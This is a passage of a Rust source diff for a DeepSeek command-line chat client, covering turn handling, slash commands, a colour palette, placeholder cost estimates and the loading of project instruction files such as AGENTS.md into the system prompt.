println!();
|
||||
|
||||
let mut blocks = Vec::new();
|
||||
if !current_thinking.is_empty() {
|
||||
blocks.push(ContentBlock::Thinking {
|
||||
thinking: current_thinking,
|
||||
});
|
||||
}
|
||||
if !current_text.is_empty() {
|
||||
blocks.push(ContentBlock::Text {
|
||||
text: current_text,
|
||||
cache_control: None,
|
||||
});
|
||||
}
|
||||
for (_index, (id, name, input)) in tool_blocks {
|
||||
let parsed = serde_json::from_str::<Value>(&input).unwrap_or(Value::String(input));
|
||||
blocks.push(ContentBlock::ToolUse {
|
||||
id,
|
||||
name,
|
||||
input: parsed,
|
||||
});
|
||||
}
|
||||
|
||||
messages.push(Message {
|
||||
role: "assistant".to_string(),
|
||||
content: blocks,
|
||||
});
|
||||
} else {
|
||||
let response = client.create_message(request).await?;
|
||||
for block in &response.content {
|
||||
match block {
|
||||
ContentBlock::Thinking { thinking } => {
|
||||
println!("{}", ds_sky("\nThinking 💭").dimmed());
|
||||
println!("{}", ds_sky(thinking).dimmed());
|
||||
}
|
||||
ContentBlock::Text { text, .. } => {
|
||||
println!("{text}");
|
||||
}
|
||||
ContentBlock::ToolUse { name, input, .. } => {
|
||||
println!(
|
||||
"{} {}",
|
||||
ds_blue("Tool Call:").bold(),
|
||||
ds_blue(name).bold()
|
||||
);
|
||||
println!("{}", pretty_json(input));
|
||||
}
|
||||
ContentBlock::ToolResult { content, .. } => {
|
||||
if let Ok(value) = serde_json::from_str::<Value>(content) {
|
||||
println!("{}", pretty_json(&value));
|
||||
} else {
|
||||
println!("{content}");
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
messages.push(Message {
|
||||
role: "assistant".to_string(),
|
||||
content: response.content,
|
||||
});
|
||||
stats.update(&response.usage);
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
async fn process_official_turn(
|
||||
client: &DeepSeekClient,
|
||||
options: &TextChatOptions,
|
||||
messages: &mut Vec<Value>,
|
||||
user_input: &str,
|
||||
stats: &mut SessionStats,
|
||||
) -> Result<()> {
|
||||
messages.push(json!({ "role": "user", "content": user_input }));
|
||||
|
||||
let request = json!({
|
||||
"model": options.model,
|
||||
"messages": messages,
|
||||
"stream": false,
|
||||
"max_tokens": options.max_tokens,
|
||||
"temperature": options.temperature,
|
||||
"top_p": options.top_p,
|
||||
"tools": options.tools,
|
||||
"tool_choice": options.tool_choice,
|
||||
});
|
||||
|
||||
let response: Value = client
|
||||
.post_json("/v1/text/chatcompletion_v2", &request)
|
||||
.await?;
|
||||
if let Some(text) = extract_text_from_response(&response) {
|
||||
println!("{text}");
|
||||
messages.push(json!({ "role": "assistant", "content": text }));
|
||||
} else {
|
||||
println!("{}", pretty_json(&response));
|
||||
}
|
||||
update_stats_from_official_response(&response, stats);
|
||||
|
||||
Ok(())
|
||||
}
|
||||
|
||||
fn extract_text_from_response(response: &Value) -> Option<String> {
|
||||
let choices = response.get("choices")?.as_array()?;
|
||||
let choice = choices.first()?;
|
||||
if let Some(message) = choice.get("message")
|
||||
&& let Some(content) = message.get("content")
|
||||
&& let Some(text) = content.as_str()
|
||||
{
|
||||
return Some(text.to_string());
|
||||
}
|
||||
if let Some(text) = choice.get("text").and_then(|v| v.as_str()) {
|
||||
return Some(text.to_string());
|
||||
}
|
||||
None
|
||||
}
|
||||
|
||||
fn build_system_prompt(system: Option<&str>, cache_system: bool) -> Option<SystemPrompt> {
|
||||
let text = system?;
|
||||
if !cache_system {
|
||||
return Some(SystemPrompt::Text(text.to_string()));
|
||||
}
|
||||
let blocks = vec![SystemBlock {
|
||||
block_type: "text".to_string(),
|
||||
text: text.to_string(),
|
||||
cache_control: Some(CacheControl {
|
||||
cache_type: "ephemeral".to_string(),
|
||||
}),
|
||||
}];
|
||||
Some(SystemPrompt::Blocks(blocks))
|
||||
}
|
||||
|
||||
fn cache_tools(tools: Option<Vec<Tool>>, cache_tools: bool) -> Option<Vec<Tool>> {
|
||||
if !cache_tools {
|
||||
return tools;
|
||||
}
|
||||
let mut tools = tools?;
|
||||
if let Some(last) = tools.last_mut() {
|
||||
last.cache_control = Some(CacheControl {
|
||||
cache_type: "ephemeral".to_string(),
|
||||
});
|
||||
}
|
||||
Some(tools)
|
||||
}
|
||||
|
||||
fn update_stats_from_official_response(response: &Value, stats: &mut SessionStats) {
|
||||
let usage = response.get("usage").and_then(|value| value.as_object());
|
||||
if let Some(usage) = usage {
|
||||
let input = usage
|
||||
.get("input_tokens")
|
||||
.or_else(|| usage.get("prompt_tokens"))
|
||||
.and_then(serde_json::Value::as_u64)
|
||||
.and_then(|v| u32::try_from(v).ok())
|
||||
.unwrap_or(0);
|
||||
let output = usage
|
||||
.get("output_tokens")
|
||||
.or_else(|| usage.get("completion_tokens"))
|
||||
.and_then(serde_json::Value::as_u64)
|
||||
.and_then(|v| u32::try_from(v).ok())
|
||||
.unwrap_or(0);
|
||||
let total = usage
|
||||
.get("total_tokens")
|
||||
.and_then(serde_json::Value::as_u64)
|
||||
.and_then(|v| u32::try_from(v).ok())
|
||||
.unwrap_or_else(|| input.saturating_add(output));
|
||||
stats.add_counts(input, output, Some(total));
|
||||
}
|
||||
}
|
||||
|
||||
fn matches_exit(input: &str) -> bool {
|
||||
let normalized = input.trim().to_lowercase();
|
||||
matches!(normalized.as_str(), "exit" | "quit" | "q" | "/exit")
|
||||
}
|
||||
|
||||
fn handle_command_deepseek(
|
||||
input: &str,
|
||||
messages: &mut Vec<Message>,
|
||||
options: Option<&TextChatOptions>,
|
||||
stats: &mut SessionStats,
|
||||
) -> bool {
|
||||
let trimmed = input.trim();
|
||||
if !trimmed.starts_with('/') {
|
||||
return false;
|
||||
}
|
||||
|
||||
match trimmed {
|
||||
"/help" => {
|
||||
print_help();
|
||||
}
|
||||
"/history" => {
|
||||
println!("Messages: {}", messages.len());
|
||||
}
|
||||
"/stats" => {
|
||||
print_stats(stats);
|
||||
}
|
||||
"/clear" => {
|
||||
messages.clear();
|
||||
stats.reset();
|
||||
if let Some(options) = options {
|
||||
print_session_info(
|
||||
options,
|
||||
messages.len(),
|
||||
options.tools.as_ref().map_or(0, std::vec::Vec::len),
|
||||
);
|
||||
}
|
||||
}
|
||||
_ => {
|
||||
println!("Unknown command. Type /help for available commands.");
|
||||
}
|
||||
}
|
||||
true
|
||||
}
|
||||
|
||||
fn handle_command_official(
|
||||
input: &str,
|
||||
messages: &mut Vec<Value>,
|
||||
options: Option<&TextChatOptions>,
|
||||
stats: &mut SessionStats,
|
||||
system_prompt: Option<&str>,
|
||||
) -> bool {
|
||||
let trimmed = input.trim();
|
||||
if !trimmed.starts_with('/') {
|
||||
return false;
|
||||
}
|
||||
|
||||
match trimmed {
|
||||
"/help" => {
|
||||
print_help();
|
||||
}
|
||||
"/history" => {
|
||||
println!("Messages: {}", messages.len());
|
||||
}
|
||||
"/stats" => {
|
||||
print_stats(stats);
|
||||
}
|
||||
"/clear" => {
|
||||
messages.clear();
|
||||
if let Some(system) = system_prompt {
|
||||
messages.push(json!({ "role": "system", "content": system }));
|
||||
}
|
||||
stats.reset();
|
||||
if let Some(options) = options {
|
||||
print_session_info(
|
||||
options,
|
||||
messages.len(),
|
||||
options.tools.as_ref().map_or(0, std::vec::Vec::len),
|
||||
);
|
||||
}
|
||||
}
|
||||
_ => {
|
||||
println!("Unknown command. Type /help for available commands.");
|
||||
}
|
||||
}
|
||||
true
|
||||
}
|
||||
|
||||
fn print_banner(mode: &str) {
|
||||
println!("{}", ds_blue("DeepSeek CLI").bold());
|
||||
println!("Mode: {mode}");
|
||||
println!("Type /help for commands. Use /exit to quit.\n");
|
||||
}
|
||||
|
||||
fn print_help() {
|
||||
println!("{}", ds_sky("Commands:").bold());
|
||||
println!(" /help Show this help");
|
||||
println!(" /clear Clear history (keeps system prompt)");
|
||||
println!(" /history Show message count");
|
||||
println!(" /stats Show token stats");
|
||||
println!(" /exit Exit session");
|
||||
}
|
||||
|
||||
fn print_session_info(options: &TextChatOptions, messages: usize, tools: usize) {
|
||||
let width = 56usize;
|
||||
let header = "Session Info";
|
||||
println!("┌{}┐", "─".repeat(width));
|
||||
println!("│{:^width$}│", ds_blue(header).bold(), width = width);
|
||||
println!("├{}┤", "─".repeat(width));
|
||||
println!(
|
||||
"│ {:<width$}│",
|
||||
format!("Model: {}", options.model),
|
||||
width = width - 1
|
||||
);
|
||||
println!(
|
||||
"│ {:<width$}│",
|
||||
format!("Messages: {}", messages),
|
||||
width = width - 1
|
||||
);
|
||||
println!(
|
||||
"│ {:<width$}│",
|
||||
format!("Tools: {}", tools),
|
||||
width = width - 1
|
||||
);
|
||||
println!("└{}┘", "─".repeat(width));
|
||||
println!();
|
||||
}
|
||||
|
||||
fn print_stats(stats: &SessionStats) {
|
||||
let elapsed = stats.started.elapsed();
|
||||
let seconds = elapsed.as_secs();
|
||||
let hours = seconds / 3600;
|
||||
let minutes = (seconds % 3600) / 60;
|
||||
let secs = seconds % 60;
|
||||
|
||||
println!("{}", ds_sky("Session Stats").bold());
|
||||
println!(" Duration: {hours:02}:{minutes:02}:{secs:02}");
|
||||
println!(" Input tokens: {}", stats.input_tokens);
|
||||
println!(" Output tokens: {}", stats.output_tokens);
|
||||
if stats.total_tokens > 0 {
|
||||
println!(" Total tokens: {}", stats.total_tokens);
|
||||
}
|
||||
}
|
||||
|
||||
fn ds_blue(text: &str) -> ColoredString {
|
||||
let (r, g, b) = palette::DEEPSEEK_BLUE_RGB;
|
||||
text.truecolor(r, g, b)
|
||||
}
|
||||
|
||||
fn ds_sky(text: &str) -> ColoredString {
|
||||
let (r, g, b) = palette::DEEPSEEK_SKY_RGB;
|
||||
text.truecolor(r, g, b)
|
||||
}
|
||||
|
||||
fn ds_red(text: &str) -> ColoredString {
|
||||
let (r, g, b) = palette::DEEPSEEK_RED_RGB;
|
||||
text.truecolor(r, g, b)
|
||||
}
|
||||
|
||||
struct SessionStats {
|
||||
started: Instant,
|
||||
input_tokens: u32,
|
||||
output_tokens: u32,
|
||||
total_tokens: u32,
|
||||
}
|
||||
|
||||
impl SessionStats {
|
||||
fn new() -> Self {
|
||||
Self {
|
||||
started: Instant::now(),
|
||||
input_tokens: 0,
|
||||
output_tokens: 0,
|
||||
total_tokens: 0,
|
||||
}
|
||||
}
|
||||
|
||||
fn update(&mut self, usage: &Usage) {
|
||||
self.add_counts(usage.input_tokens, usage.output_tokens, None);
|
||||
}
|
||||
|
||||
fn add_counts(&mut self, input: u32, output: u32, total: Option<u32>) {
|
||||
self.input_tokens = self.input_tokens.saturating_add(input);
|
||||
self.output_tokens = self.output_tokens.saturating_add(output);
|
||||
let total = total.unwrap_or_else(|| input.saturating_add(output));
|
||||
self.total_tokens = self.total_tokens.saturating_add(total);
|
||||
}
|
||||
|
||||
fn reset(&mut self) {
|
||||
self.started = Instant::now();
|
||||
self.input_tokens = 0;
|
||||
self.output_tokens = 0;
|
||||
self.total_tokens = 0;
|
||||
}
|
||||
}
|
||||
|
||||
#[derive(Clone)]
|
||||
struct CommandCompleter {
|
||||
commands: Vec<String>,
|
||||
}
|
||||
|
||||
impl Helper for CommandCompleter {}
|
||||
impl Hinter for CommandCompleter {
|
||||
type Hint = String;
|
||||
}
|
||||
impl Highlighter for CommandCompleter {}
|
||||
impl Validator for CommandCompleter {}
|
||||
|
||||
impl Completer for CommandCompleter {
|
||||
type Candidate = Pair;
|
||||
|
||||
fn complete(
|
||||
&self,
|
||||
line: &str,
|
||||
pos: usize,
|
||||
_ctx: &RlContext<'_>,
|
||||
) -> Result<(usize, Vec<Pair>), ReadlineError> {
|
||||
if !line.trim_start().starts_with('/') {
|
||||
return Ok((pos, Vec::new()));
|
||||
}
|
||||
let start = line.rfind('/').unwrap_or(0);
|
||||
let prefix = &line[start..pos];
|
||||
let matches = self
|
||||
.commands
|
||||
.iter()
|
||||
.filter(|cmd| cmd.starts_with(prefix))
|
||||
.map(|cmd| Pair {
|
||||
display: cmd.clone(),
|
||||
replacement: cmd.clone(),
|
||||
})
|
||||
.collect();
|
||||
Ok((start, matches))
|
||||
}
|
||||
}
|
||||
|
||||
fn create_editor() -> Result<Editor<CommandCompleter, DefaultHistory>> {
|
||||
let helper = CommandCompleter {
|
||||
commands: vec![
|
||||
"/help".to_string(),
|
||||
"/clear".to_string(),
|
||||
"/history".to_string(),
|
||||
"/stats".to_string(),
|
||||
"/exit".to_string(),
|
||||
],
|
||||
};
|
||||
let mut editor = Editor::new()?;
|
||||
editor.set_helper(Some(helper));
|
||||
if let Some(path) = history_path() {
|
||||
let _ = editor.load_history(&path);
|
||||
}
|
||||
Ok(editor)
|
||||
}
|
||||
|
||||
fn read_prompt(editor: &mut Editor<CommandCompleter, DefaultHistory>) -> Result<Option<String>> {
|
||||
match editor.readline("You> ") {
|
||||
Ok(line) => {
|
||||
let trimmed = line.trim().to_string();
|
||||
if !trimmed.is_empty() {
|
||||
editor.add_history_entry(trimmed.as_str())?;
|
||||
if let Some(path) = history_path() {
|
||||
let _ = editor.append_history(&path);
|
||||
}
|
||||
}
|
||||
Ok(Some(trimmed))
|
||||
}
|
||||
Err(ReadlineError::Interrupted) => Ok(Some(String::new())),
|
||||
Err(ReadlineError::Eof) => Ok(None),
|
||||
Err(err) => Err(err.into()),
|
||||
}
|
||||
}
|
||||
|
||||
fn history_path() -> Option<std::path::PathBuf> {
|
||||
dirs::home_dir().map(|home| {
|
||||
let dir = home.join(".deepseek");
|
||||
let _ = std::fs::create_dir_all(&dir);
|
||||
dir.join("history")
|
||||
})
|
||||
}
|
||||
|
||||
async fn handle_line_deepseek(
|
||||
line: String,
|
||||
client: &DeepSeekClient,
|
||||
options: &TextChatOptions,
|
||||
messages: &mut Vec<Message>,
|
||||
stats: &mut SessionStats,
|
||||
) -> Result<bool> {
|
||||
let input = line.trim();
|
||||
if input.is_empty() {
|
||||
return Ok(false);
|
||||
}
|
||||
if matches_exit(input) {
|
||||
return Ok(true);
|
||||
}
|
||||
if handle_command_deepseek(input, messages, Some(options), stats) {
|
||||
return Ok(false);
|
||||
}
|
||||
if let Err(error) = process_deepseek_turn(client, options, messages, input, stats).await {
|
||||
eprintln!("{} {}", ds_red("Error:").bold(), error);
|
||||
}
|
||||
Ok(false)
|
||||
}
|
||||
|
||||
async fn handle_line_official(
|
||||
line: String,
|
||||
client: &DeepSeekClient,
|
||||
options: &TextChatOptions,
|
||||
messages: &mut Vec<Value>,
|
||||
stats: &mut SessionStats,
|
||||
system_prompt: Option<&str>,
|
||||
) -> Result<bool> {
|
||||
let input = line.trim();
|
||||
if input.is_empty() {
|
||||
return Ok(false);
|
||||
}
|
||||
if matches_exit(input) {
|
||||
return Ok(true);
|
||||
}
|
||||
if handle_command_official(input, messages, Some(options), stats, system_prompt) {
|
||||
return Ok(false);
|
||||
}
|
||||
if let Err(error) = process_official_turn(client, options, messages, input, stats).await {
|
||||
eprintln!("{} {}", ds_red("Error:").bold(), error);
|
||||
}
|
||||
Ok(false)
|
||||
}
|
||||
@@ -0,0 +1,84 @@
|
||||
//! DeepSeek color palette and semantic roles.
|
||||
|
||||
use ratatui::style::Color;
|
||||
|
||||
pub const DEEPSEEK_BLUE_RGB: (u8, u8, u8) = (53, 120, 229); // #3578E5
|
||||
pub const DEEPSEEK_SKY_RGB: (u8, u8, u8) = (106, 174, 242);
|
||||
#[allow(dead_code)]
|
||||
pub const DEEPSEEK_AQUA_RGB: (u8, u8, u8) = (54, 187, 212);
|
||||
pub const DEEPSEEK_NAVY_RGB: (u8, u8, u8) = (24, 63, 138);
|
||||
pub const DEEPSEEK_INK_RGB: (u8, u8, u8) = (11, 21, 38);
|
||||
pub const DEEPSEEK_SLATE_RGB: (u8, u8, u8) = (18, 28, 46);
|
||||
pub const DEEPSEEK_RED_RGB: (u8, u8, u8) = (226, 80, 96);
|
||||
|
||||
pub const DEEPSEEK_BLUE: Color = Color::Rgb(
|
||||
DEEPSEEK_BLUE_RGB.0,
|
||||
DEEPSEEK_BLUE_RGB.1,
|
||||
DEEPSEEK_BLUE_RGB.2,
|
||||
);
|
||||
pub const DEEPSEEK_SKY: Color =
|
||||
Color::Rgb(DEEPSEEK_SKY_RGB.0, DEEPSEEK_SKY_RGB.1, DEEPSEEK_SKY_RGB.2);
|
||||
#[allow(dead_code)]
|
||||
pub const DEEPSEEK_AQUA: Color = Color::Rgb(
|
||||
DEEPSEEK_AQUA_RGB.0,
|
||||
DEEPSEEK_AQUA_RGB.1,
|
||||
DEEPSEEK_AQUA_RGB.2,
|
||||
);
|
||||
pub const DEEPSEEK_NAVY: Color = Color::Rgb(
|
||||
DEEPSEEK_NAVY_RGB.0,
|
||||
DEEPSEEK_NAVY_RGB.1,
|
||||
DEEPSEEK_NAVY_RGB.2,
|
||||
);
|
||||
pub const DEEPSEEK_INK: Color =
|
||||
Color::Rgb(DEEPSEEK_INK_RGB.0, DEEPSEEK_INK_RGB.1, DEEPSEEK_INK_RGB.2);
|
||||
pub const DEEPSEEK_SLATE: Color = Color::Rgb(
|
||||
DEEPSEEK_SLATE_RGB.0,
|
||||
DEEPSEEK_SLATE_RGB.1,
|
||||
DEEPSEEK_SLATE_RGB.2,
|
||||
);
|
||||
pub const DEEPSEEK_RED: Color =
|
||||
Color::Rgb(DEEPSEEK_RED_RGB.0, DEEPSEEK_RED_RGB.1, DEEPSEEK_RED_RGB.2);
|
||||
|
||||
pub const TEXT_PRIMARY: Color = Color::White;
|
||||
pub const TEXT_MUTED: Color = Color::DarkGray;
|
||||
pub const TEXT_DIM: Color = Color::Gray;
|
||||
|
||||
pub const STATUS_SUCCESS: Color = DEEPSEEK_SKY;
|
||||
pub const STATUS_WARNING: Color = DEEPSEEK_SKY;
|
||||
pub const STATUS_ERROR: Color = DEEPSEEK_RED;
|
||||
#[allow(dead_code)]
|
||||
pub const STATUS_INFO: Color = DEEPSEEK_BLUE;
|
||||
|
||||
pub const SELECTION_BG: Color = Color::Rgb(26, 44, 74);
|
||||
pub const COMPOSER_BG: Color = DEEPSEEK_SLATE;
|
||||
|
||||
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
|
||||
pub struct UiTheme {
|
||||
pub name: &'static str,
|
||||
pub composer_bg: Color,
|
||||
pub selection_bg: Color,
|
||||
pub header_bg: Color,
|
||||
}
|
||||
|
||||
pub fn ui_theme(name: &str) -> UiTheme {
|
||||
match name.to_ascii_lowercase().as_str() {
|
||||
"dark" => UiTheme {
|
||||
name: "dark",
|
||||
composer_bg: DEEPSEEK_INK,
|
||||
selection_bg: Color::Rgb(30, 52, 92),
|
||||
header_bg: DEEPSEEK_INK,
|
||||
},
|
||||
"light" => UiTheme {
|
||||
name: "light",
|
||||
composer_bg: Color::Rgb(26, 38, 58),
|
||||
selection_bg: Color::Rgb(38, 64, 112),
|
||||
header_bg: DEEPSEEK_SLATE,
|
||||
},
|
||||
_ => UiTheme {
|
||||
name: "default",
|
||||
composer_bg: COMPOSER_BG,
|
||||
selection_bg: SELECTION_BG,
|
||||
header_bg: DEEPSEEK_INK,
|
||||
},
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,52 @@
|
||||
//! Cost estimation placeholders for tool executions.
|
||||
//!
|
||||
//! DeepSeek CLI focuses on text-only workflows; no paid multimedia tools are exposed
|
||||
//! by default, so cost estimates are currently unavailable.
|
||||
|
||||
use serde_json::Value;
|
||||
|
||||
/// Estimated cost for a tool execution
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct CostEstimate {
|
||||
/// Minimum cost in USD
|
||||
pub min_usd: f64,
|
||||
/// Maximum cost in USD
|
||||
pub max_usd: f64,
|
||||
/// Cost breakdown explanation
|
||||
pub breakdown: String,
|
||||
}
|
||||
|
||||
impl CostEstimate {
|
||||
#[must_use]
|
||||
#[allow(dead_code)]
|
||||
pub fn new(min_usd: f64, max_usd: f64, breakdown: impl Into<String>) -> Self {
|
||||
Self {
|
||||
min_usd,
|
||||
max_usd,
|
||||
breakdown: breakdown.into(),
|
||||
}
|
||||
}
|
||||
|
||||
#[must_use]
|
||||
#[allow(dead_code)]
|
||||
pub fn fixed(usd: f64, breakdown: impl Into<String>) -> Self {
|
||||
Self::new(usd, usd, breakdown)
|
||||
}
|
||||
|
||||
/// Format the cost for display
|
||||
#[must_use]
|
||||
pub fn display(&self) -> String {
|
||||
if (self.min_usd - self.max_usd).abs() < 0.0001 {
|
||||
format!("${:.4}", self.min_usd)
|
||||
} else {
|
||||
format!("${:.4} - ${:.4}", self.min_usd, self.max_usd)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Get cost estimate for a tool by name
|
||||
#[must_use]
|
||||
pub fn estimate_tool_cost(tool_name: &str, params: &Value) -> Option<CostEstimate> {
|
||||
let _ = (tool_name, params);
|
||||
None
|
||||
}
|
||||
@@ -0,0 +1,456 @@
|
||||
//! Project context loading for deepseek-cli.
|
||||
//!
|
||||
//! This module handles loading project-specific context files that provide
|
||||
//! instructions and context to the AI agent. These include:
|
||||
//!
|
||||
//! - `AGENTS.md` - Project-level agent instructions (primary)
|
||||
//! - `.claude/instructions.md` - Claude-style hidden instructions
|
||||
//! - `CLAUDE.md` - Claude-style instructions
|
||||
//! - `.deepseek/instructions.md` - Hidden instructions file (legacy)
|
||||
//!
|
||||
//! The loaded content is injected into the system prompt to give the agent
|
||||
//! context about the project's conventions, structure, and requirements.
|
||||
|
||||
#![allow(dead_code)] // Public API - some functions reserved for future use
|
||||
|
||||
use std::fs;
|
||||
use std::path::{Path, PathBuf};
|
||||
|
||||
use thiserror::Error;
|
||||
|
||||
/// Names of project context files to look for, in priority order.
|
||||
const PROJECT_CONTEXT_FILES: &[&str] = &[
|
||||
"AGENTS.md",
|
||||
".claude/instructions.md",
|
||||
"CLAUDE.md",
|
||||
".deepseek/instructions.md",
|
||||
];
|
||||
|
||||
/// Maximum size for project context files (to prevent loading huge files)
|
||||
const MAX_CONTEXT_SIZE: usize = 100 * 1024; // 100KB
|
||||
|
||||
// === Errors ===
|
||||
|
||||
#[derive(Debug, Error)]
|
||||
enum ProjectContextError {
|
||||
#[error("Failed to read context metadata for {path}: {source}")]
|
||||
Metadata {
|
||||
path: PathBuf,
|
||||
source: std::io::Error,
|
||||
},
|
||||
#[error("Context file {path} is too large ({size} bytes, max {max})")]
|
||||
TooLarge {
|
||||
path: PathBuf,
|
||||
size: u64,
|
||||
max: usize,
|
||||
},
|
||||
#[error("Failed to read context file {path}: {source}")]
|
||||
Read {
|
||||
path: PathBuf,
|
||||
source: std::io::Error,
|
||||
},
|
||||
#[error("Context file {path} is empty")]
|
||||
Empty { path: PathBuf },
|
||||
}
|
||||
|
||||
/// Result of loading project context
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct ProjectContext {
|
||||
/// The loaded instructions content
|
||||
pub instructions: Option<String>,
|
||||
/// Path to the loaded file (for display)
|
||||
pub source_path: Option<PathBuf>,
|
||||
/// Any warnings during loading
|
||||
pub warnings: Vec<String>,
|
||||
/// Project root directory
|
||||
pub project_root: PathBuf,
|
||||
/// Whether this is a trusted project
|
||||
pub is_trusted: bool,
|
||||
}
|
||||
|
||||
impl ProjectContext {
|
||||
/// Create an empty project context
|
||||
pub fn empty(project_root: PathBuf) -> Self {
|
||||
Self {
|
||||
instructions: None,
|
||||
source_path: None,
|
||||
warnings: Vec::new(),
|
||||
project_root,
|
||||
is_trusted: false,
|
||||
}
|
||||
}
|
||||
|
||||
/// Check if any instructions were loaded
|
||||
pub fn has_instructions(&self) -> bool {
|
||||
self.instructions.is_some()
|
||||
}
|
||||
|
||||
/// Get the instructions as a formatted block for system prompt
|
||||
pub fn as_system_block(&self) -> Option<String> {
|
||||
self.instructions.as_ref().map(|content| {
|
||||
let source = self
|
||||
.source_path
|
||||
.as_ref()
|
||||
.map_or_else(|| "project".to_string(), |p| p.display().to_string());
|
||||
|
||||
format!(
|
||||
"<project_instructions source=\"{source}\">\n{content}\n</project_instructions>"
|
||||
)
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
/// Load project context from the workspace directory.
|
||||
///
|
||||
/// This searches for known project context files and loads the first one found.
|
||||
pub fn load_project_context(workspace: &Path) -> ProjectContext {
|
||||
let mut ctx = ProjectContext::empty(workspace.to_path_buf());
|
||||
|
||||
// Search for project context files
|
||||
for filename in PROJECT_CONTEXT_FILES {
|
||||
let file_path = workspace.join(filename);
|
||||
|
||||
if file_path.exists() && file_path.is_file() {
|
||||
match load_context_file(&file_path) {
|
||||
Ok(content) => {
|
||||
ctx.instructions = Some(content);
|
||||
ctx.source_path = Some(file_path);
|
||||
break;
|
||||
}
|
||||
Err(error) => {
|
||||
ctx.warnings.push(error.to_string());
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Check for trust file
|
||||
ctx.is_trusted = check_trust_status(workspace);
|
||||
|
||||
ctx
|
||||
}
|
||||
|
||||
/// Load project context from parent directories as well.
|
||||
///
|
||||
/// This allows for monorepo setups where a root AGENTS.md applies to all subdirectories.
|
||||
pub fn load_project_context_with_parents(workspace: &Path) -> ProjectContext {
|
||||
let mut ctx = load_project_context(workspace);
|
||||
|
||||
// If no context found in workspace, check parent directories
|
||||
if !ctx.has_instructions() {
|
||||
let mut current = workspace.parent();
|
||||
|
||||
while let Some(parent) = current {
|
||||
// Stop at git root or filesystem root
|
||||
if parent.join(".git").exists() {
|
||||
let parent_ctx = load_project_context(parent);
|
||||
if parent_ctx.has_instructions() {
|
||||
ctx.instructions = parent_ctx.instructions;
|
||||
ctx.source_path = parent_ctx.source_path;
|
||||
}
|
||||
break;
|
||||
}
|
||||
|
||||
let parent_ctx = load_project_context(parent);
|
||||
if parent_ctx.has_instructions() {
|
||||
ctx.instructions = parent_ctx.instructions;
|
||||
ctx.source_path = parent_ctx.source_path;
|
||||
break;
|
||||
}
|
||||
|
||||
current = parent.parent();
|
||||
}
|
||||
}
|
||||
|
||||
ctx
|
||||
}
|
||||
|
||||
/// Load a context file with size checking
|
||||
fn load_context_file(path: &Path) -> Result<String, ProjectContextError> {
|
||||
// Check file size first
|
||||
let metadata = fs::metadata(path).map_err(|source| ProjectContextError::Metadata {
|
||||
path: path.to_path_buf(),
|
||||
source,
|
||||
})?;
|
||||
|
||||
if metadata.len() > MAX_CONTEXT_SIZE as u64 {
|
||||
return Err(ProjectContextError::TooLarge {
|
||||
path: path.to_path_buf(),
|
||||
size: metadata.len(),
|
||||
max: MAX_CONTEXT_SIZE,
|
||||
});
|
||||
}
|
||||
|
||||
// Read the file
|
||||
let content = fs::read_to_string(path).map_err(|source| ProjectContextError::Read {
|
||||
path: path.to_path_buf(),
|
||||
source,
|
||||
})?;
|
||||
|
||||
// Basic validation
|
||||
if content.trim().is_empty() {
|
||||
return Err(ProjectContextError::Empty {
|
||||
path: path.to_path_buf(),
|
||||
});
|
||||
}
|
||||
|
||||
Ok(content)
|
||||
}
|
||||
|
||||
/// Check if this project is marked as trusted
|
||||
fn check_trust_status(workspace: &Path) -> bool {
|
||||
// Check for trust markers
|
||||
let trust_markers = [
|
||||
workspace.join(".deepseek").join("trusted"),
|
||||
workspace.join(".deepseek").join("trust.json"),
|
||||
];
|
||||
|
||||
for marker in &trust_markers {
|
||||
if marker.exists() {
|
||||
return true;
|
||||
}
|
||||
}
|
||||
|
||||
false
|
||||
}
|
||||
|
||||
/// Create a default AGENTS.md file for a project
|
||||
pub fn create_default_agents_md(workspace: &Path) -> std::io::Result<PathBuf> {
|
||||
let agents_path = workspace.join("AGENTS.md");
|
||||
|
||||
let default_content = r#"# Project Agent Instructions
|
||||
|
||||
This file provides guidance to AI agents (DeepSeek CLI, Claude Code, etc.) when working with code in this repository.
|
||||
|
||||
## File Location
|
||||
|
||||
Save this file as `AGENTS.md` in your project root so the CLI can load it automatically.
|
||||
|
||||
## Build and Development Commands
|
||||
|
||||
```bash
|
||||
# Build
|
||||
# cargo build # Rust projects
|
||||
# npm run build # Node.js projects
|
||||
# python -m build # Python projects
|
||||
|
||||
# Test
|
||||
# cargo test # Rust
|
||||
# npm test # Node.js
|
||||
# pytest # Python
|
||||
|
||||
# Lint and Format
|
||||
# cargo fmt && cargo clippy # Rust
|
||||
# npm run lint # Node.js
|
||||
# ruff check . # Python
|
||||
```
|
||||
|
||||
## Architecture Overview
|
||||
|
||||
<!-- Describe your project's high-level architecture here -->
|
||||
<!-- Focus on the "big picture" that requires reading multiple files to understand -->
|
||||
|
||||
### Key Components
|
||||
|
||||
<!-- List and describe the main components/modules -->
|
||||
|
||||
### Data Flow
|
||||
|
||||
<!-- Describe how data flows through the system -->
|
||||
|
||||
## Configuration Files
|
||||
|
||||
<!-- List important configuration files and their purposes -->
|
||||
|
||||
## Extension Points
|
||||
|
||||
<!-- Describe how to extend the codebase (add new features, tools, etc.) -->
|
||||
|
||||
## Commit Messages
|
||||
|
||||
Use conventional commits: `feat:`, `fix:`, `docs:`, `refactor:`, `test:`, `chore:`
|
||||
"#;
|
||||
|
||||
fs::write(&agents_path, default_content)?;
|
||||
Ok(agents_path)
|
||||
}
|
||||
|
||||
/// Merge multiple project contexts (e.g., from nested directories)
|
||||
pub fn merge_contexts(contexts: &[ProjectContext]) -> Option<String> {
|
||||
let non_empty: Vec<_> = contexts
|
||||
.iter()
|
||||
.filter_map(ProjectContext::as_system_block)
|
||||
.collect();
|
||||
|
||||
if non_empty.is_empty() {
|
||||
None
|
||||
} else {
|
||||
Some(non_empty.join("\n\n"))
|
||||
}
|
||||
}
|
||||
|
||||
// === Unit Tests ===
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
use tempfile::tempdir;
|
||||
|
||||
#[test]
|
||||
fn test_load_project_context_empty() {
|
||||
let tmp = tempdir().expect("tempdir");
|
||||
let ctx = load_project_context(tmp.path());
|
||||
|
||||
